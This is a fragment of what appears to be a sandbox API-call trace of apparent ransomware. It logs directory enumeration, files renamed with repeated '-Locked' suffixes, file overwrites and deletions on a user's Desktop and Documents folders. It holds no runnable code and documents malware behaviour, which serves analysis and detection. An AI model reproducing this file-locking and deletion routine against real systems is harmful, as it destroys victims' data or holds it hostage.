dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0302.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0302.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0302.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0302.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0302.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0302.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0302.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0302.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0302.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0302.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0302.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0302.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0302.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0302.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0302.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0302.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0302.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 0 [0302.052] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.052] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0302.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.052] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.064] GetFileType (hFile=0x49c) returned 0x1 [0302.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.064] GetFileType (hFile=0x49c) returned 0x1 [0302.067] CloseHandle (hObject=0x49c) returned 1 [0302.067] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked", lpFilePart=0x0) returned 0x38 [0302.067] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked")) returned 1 [0302.073] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0302.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.073] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.078] GetFileType (hFile=0x49c) returned 0x1 [0302.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.079] GetFileType (hFile=0x49c) returned 0x1 [0302.080] CloseHandle (hObject=0x49c) returned 1 [0302.081] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.081] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked")) returned 1 [0302.116] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0302.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.117] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.131] GetFileType (hFile=0x49c) returned 0x1 [0302.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.132] GetFileType (hFile=0x49c) returned 0x1 [0302.133] CloseHandle (hObject=0x49c) returned 1 [0302.134] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0302.134] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0302.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0302.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0302.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0302.137] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.140] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ab3ab5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ab3ab5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ab3ab5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0302.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335e853e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335e853e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335e853e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked-Locked", cAlternateFileName="1FEG~1.XLS")) returned 1 [0302.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ace7f4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ace7f4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ace7f4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0302.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335efa7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335efa7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335efa7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked-Locked", cAlternateFileName="2XKT2-~1.PPT")) returned 1 [0302.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ae0e22, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ae0e22, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ae0e22, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0302.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335f5e17, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335f5e17, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335f5e17, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked-Locked", cAlternateFileName="4YEBKI~1.XLS")) returned 1 [0302.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32af1d8c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32af1d8c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32af1d8c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0302.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335fbe0e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335fbe0e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335fbe0e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked-Locked", cAlternateFileName="4GH0Y9~2.PDF")) returned 1 [0302.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b00832, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b00832, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b00832, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0302.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33602049, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33602049, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33602049, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked-Locked", cAlternateFileName="88Z1O5~1.DOC")) returned 1 [0302.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b119bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b119bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b119bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0302.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336081fa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336081fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336081fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", cAlternateFileName="9WUI5E~1.DOC")) returned 1 [0302.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b22d39, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b22d39, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b22d39, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0302.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3360e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3360e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3360e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", cAlternateFileName="AWNRFZ~1.PPT")) returned 1 [0302.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b3156b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b3156b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b3156b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361452d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361452d, 